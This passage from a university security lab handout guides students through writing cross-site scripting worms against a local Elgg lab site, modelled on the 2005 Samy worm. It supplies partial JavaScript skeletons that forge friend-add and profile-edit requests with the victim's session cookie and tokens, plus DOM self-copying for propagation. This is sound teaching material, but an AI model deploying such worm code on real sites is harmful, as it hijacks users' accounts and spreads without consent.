  • 6. menu. 4. Include in your project document: a. a screen printout with the text printed by the TCP server. b. the JavaScript script you used in step 2 above. vi. Writing an XSS Worm In this and next task, we will perform an attack similar to what Samy did to MySpace in 2005 (i.e., the Samy Worm). First, we will write an XSS worm that does not self- propagate; in the next task, we will make it self-propagating. From the previous task, we have learned how to steal the cookies from the victim. In this task, we need to write a malicious JavaScript to forge a HTTP request directly from the victim’s browser. This attack does not require the intervention from the attacker. The JavaScript that can achieve this is called a cross-site scripting worm. This task consists of two independent sub-tasks. Subtask: XSS Worm that adds a friend The objective of the attack in this subtask is to modify the victim’s profile and add Samy as a friend of the victim. To add a friend for the victim, we should first find out how a legitimate user adds a friend in Elgg. More specifically, we need to figure out what is sent to the server when a user adds a friend. Firefox’s LiveHTTPHeaders extension can help us (available under the "Tools" menu in Firefox); it can display the header and contents of any HTTP request message sent from the browser. From this, we can identify all the parameters in the request.
  • 7. There are two common types of HTTP requests, one is HTTP GET request, and the other is HTTP POST request. These two types of HTTP requests differ in how they send the contents of the request to the server. We can use the JavaScript XMLHttpRequest object to send HTTP GET and POST requests to web applications. XMLHttpRequest can only send HTTP requests back to the server, instead of other computers, because the same-origin policy is strongly enforced for XMLHttpRequest. This is not an issue for us, because we do want to use XMLHttpRequest to send a forged HTTP request back to the Elgg server. To learn how to use XMLHttpRequest, you can study these documents: https://www.w3schools.com/xml/ajax_xmlhttprequest_create.as p https://www.w3schools.com/xml/xml_http.asp https://developer.mozilla.org/en-US/docs/AJAX/Getting_Started https://www.tutorialspoint.com/ajax/what_is_xmlhttprequest.ht m If you are not familiar with JavaScript programming, we suggest that you study the following documents to learn some basic JavaScript functions. You will have to use some of these functions. Essential Javascript – A Javascript Tutorial: https://www.evl.uic.edu/luc/bvis546/Essential_Javascript_-- _A_Javascript_Tutorial.pdf You may also need to debug your JavaScript code. Firebug is a Firefox extension that helps you debug JavaScript code. It can point you to the precise places that contain errors. FireBug is already installed in Firefox in our pre-built Ubuntu VM image (available under the "Tools" menu in Firefox). For this subtask, the worm program should do the following:
  • 8. 1. Create the correct request to add Samy to the friends list of the user who is executing the malicious code 2. Forge a HTTP GET request to add Samy as a friend. Code Skeleton. We provide a skeleton of the JavaScript code that you need to write. This JavaScript code is inserted into user Samy's profile, and any user that views Samy's profile will then automatically add Samy as their friend. You need to fill in all the necessary details. When you include the final JavaScript code in the message posted to Samy's profile, you need to remove all the comments, extra space, and new-line characters. <script id="worm" type="text/javascript"> var Ajax=null; //Construct the HTTP request to add Samy as a friend. var sendurl="…"; //Create and send Ajax request to add friend. // The format of the request can be learned from LiveHttpHeaders. Ajax=new XMLHttpRequest(); Ajax.open("GET",sendurl,true); Ajax.setRequestHeader("Host","www.xsslabelgg.com"); Ajax.setRequestHeader("Keep-Alive","300"); Ajax.setRequestHeader("Connection","keep-alive"); // (JavaScript code to access session cookie) Ajax.setRequestHeader("Cookie",document.cookie); Ajax.setRequestHeader("Content-Type","application/x-www- form-urlencoded"); Ajax.send(); </script>
  • 9. Note that in this case the GET method is used to send the HTTP request. To modify the victim's profile, the HTTP request sent by the worm should contain the victim's __elgg_ts and __elgg_token values in the sendurl variable. These details are present in the web page (right-click and "View Page Source") and the worm needs to find out and use this information using JavaScript code. The sendurl variable should also contain Samy's id. What you need to do: 1. Based on the format of the GET request to add a friend, write a JavaScript script that adds Samy to the friends list of any user who views Samy's profile. Save your JavaScript script in a file task4-1.txt. 2. Login as user Samy and inject in the "About me" field of Samy's profile the script from file task4-1.txt. (Make sure to select "Remove editor" before editing this field, in order to disable any automatic formatting) 3. Logout and login as user Alice, and then view Samy's profile by selecting user Samy from "More => Members" in the Elgg menu. At this point, the malicious Javascript script will be executed and Samy will be added to Alice's friend list. 4. Include in your project document: a. a screen printout with Alice's friends list after viewing Samy's profile. b. a printout of your JavaScript file task4-1.txt. 5. Include the file task4-1.txt in a ZIP archive and upload this ZIP archive onto the Moodle website for the course. Subtask XSS Worm that changes the victim's profile The objective of the attack in this subtask is to modify the victim’s profile "About me" field to show the text "Samy is my HERO". To do this, we should first find out how a legitimate profile change looks like in Elgg. More specifically, we need to figure out what is sent to the server when a user changes the
  • 10. "About me" field and saves her profile. Firefox’s LiveHTTPHeaders extension can help us (available under the "Tools" menu in Firefox); it can display the header and contents of any HTTP request message sent from the browser. From this, we can identify all the needed data in the request. For this subtask, the worm program should do the following: 1. Create the correct request to add a certain piece of text into the profile of a user (the victim) who is viewing Samy's profile 2. Forge a HTTP POST request to change the profile of the victim user. Code Skeleton. We provide a skeleton of the JavaScript code that you need to write. This JavaScript code is inserted into user Samy's profile, and any user that views Samy's profile will then automatically have their "About me" profile field changed to a certain piece of text. You need to fill in all the necessary details. When you include the final JavaScript code in the message posted to Samy's profile, you need to remove all the comments, extra space, and new-line characters. <script id="worm" type="text/javascript"> var Ajax=null; //Construct the HTTP POST request to modify profile. var sendurl="… "; var content= "…"; //Modify Victim's profile except for SAMY if(…) { //Create and send Ajax request to modify profile Ajax=null; Ajax=new XMLHttpRequest(); Ajax.open("POST",sendurl,true); Ajax.setRequestHeader("Host","www.xsslabelgg.com");
  • 11. Ajax.setRequestHeader("Keep-Alive","300"); Ajax.setRequestHeader("Connection","keep-alive"); // JavaScript code to access session cookie Ajax.setRequestHeader("Cookie",document.cookie); Ajax.setRequestHeader("Content-Type","application/x- www-form-urlencoded"); Ajax.send(content); } </script> Note that in this case the POST method is used to send the HTTP request. To modify the victim's profile, the HTTP request sent by the worm should contain certain information about the victim in the HTML body of the request (which is sent via the content variable): · The __elgg_ts and __elgg_token values are present in the web page (right-click and "View Page Source") and the worm needs to find out and use this information using JavaScript code. · The victim's user name can be obtained using elgg.session.user.name · The victim's id (guid) can be obtained using elgg.session.user.guid Important note: Be careful when dealing with an infected profile. If a profile is already infected by the XSS worm, you may want to leave them alone, instead of modifying them again. If you are not careful, you may end up removing the XSS worm from the profile. What you need to do: 1. Based on the format of the POST request to change a user's profile, write a JavaScript script that changes the "About me" field in the profile of any user (the victim) who views Samy's profile. The "About me" field should contain the following text:
  • 12. Samy is my HERO (added by <insert your team member name/s here> Save your JavaScript script in a file task4-2.txt. 2. Login as user Samy and inject in the "About me" field of Samy's profile the script from file task4-2.txt. (Make sure to select "Remove editor" before editing this field, in order to disable any automatic formatting) 3. Logout and login as user Alice, and then view Samy's profile by selecting user Samy from "More => Members" in the Elgg menu. At this point, the malicious Javascript script will be executed and Alice's profile will be changed. 4. Include in your project document: a. a screen printout with Alice's profile after viewing Samy's profile. b. a printout of your JavaScript file task4-2.txt. 5. Include the file task4-2.txt in a ZIP archive and upload this ZIP archive onto the Moodle website for the course. v. Writing a Self-Propagating XSS Worm To become a real worm, the malicious JavaScript program should be able to propagate itself. Namely, whenever some people view an infected profile, not only will their profiles be modified, the worm will also be propagated to their profiles, further affecting others who view these newly infected profiles. This way, the more people view the infected profiles, the faster the worm can propagate. This is exactly the same mechanism used by the Samy Worm: within just 20 hours of its October 4, 2005 release, over one million users were affected, making Samy one of the fastest spreading viruses of all time. The JavaScript code that can achieve this is called a self- propagating cross-site scripting worm. In this task, you need to implement such a worm, which infects the victim’s profile. To achieve self-propagation, when the malicious JavaScript modifies the victim’s profile, it should copy itself to the victim’s profile. If the entire JavaScript program (i.e., the
  • 13. worm) is embedded in the infected profile, to propagate the worm to another profile, the worm code can use DOM APIs to retrieve a copy of itself from the web page. An example of using DOM APIs is given below. This code gets a copy of itself, and display it in an alert window: <script id=worm> var strCode = document.getElementById("worm"); alert(strCode.innerHTML); </script> URL Encoding: All messages transmitted using HTTP over the Internet use URL Encoding, which converts all non-ASCII characters such as space to special code under the URL encoding scheme. In the worm code, messages sent to Elgg should be encoded using URL encoding. The escape function can be used to URL encode a string. An example of using the encode function is given below. <script> var strSample = "Hello World"; var urlEncSample = escape(strSample); alert(urlEncSample); </script> Under the URL encoding scheme, the “+” symbol is used to denote space. In JavaScript programs, “+” is used for both arithmetic operations and string concatenation operations. To avoid this ambiguity, you may use the concat function for string concatenation, and avoid using addition. For the worm code in the exercise, you don’t have to use additions. If you do have to add a number (e.g a+5), you can use subtraction (e.g a-(-5)). Other notes: · To modify the victim's profile, the HTTP request sent by the worm should contain the following information in the HTML body of the request (which is sent via the content variable):
  • 14. &accesslevel%5Bdescription%5D=2 (in fact, using the LiveHTTPHeaders extension, you can see this is included in a regular edit profile request) · Be careful when dealing with an infected profile. If a profile is already infected by the XSS worm, you may want to leave them alone, instead of modifying them again. If you are not careful, you may end up removing the XSS worm from the profile. What you need to do: 1. Based on the format of the POST request to change a user's profile, write a JavaScript script that changes the "About me" field in the profile of any user (the victim) who views an infected profile. The "About me" field should contain the following text: Samy is my HERO (added by <insert your team member name/s here>) Save your JavaScript script in a file task5.txt. 2. Login as user Samy and inject in the "About me" field of Samy's profile the script from file task5.txt. (Make sure to select "Remove editor" before editing this field, in order to disable any automatic formatting) 3. Logout and login as user Alice, and then view Samy's profile by selecting user Samy from "More => Members" in the Elgg menu. At this point, the malicious Javascript script will be executed and Alice's profile will be infected as well. 4. Logout and login as user Boby, and then view Alice's profile by selecting user Alice from "More => Members" in the Elgg menu. At this point, the malicious Javascript script will be executed and Boby's profile will be infected as well. 5. Include in your project document: a. a screen printout with Alice's profile after viewing Samy's profile. b. a screen printout with Boby's profile after viewing Alice's profile. c. A printout of your JavaScript file task5.txt.
  • 15. 6. Include the file task5.txt in a ZIP archive and upload this ZIP archive onto the Moodle website for the course.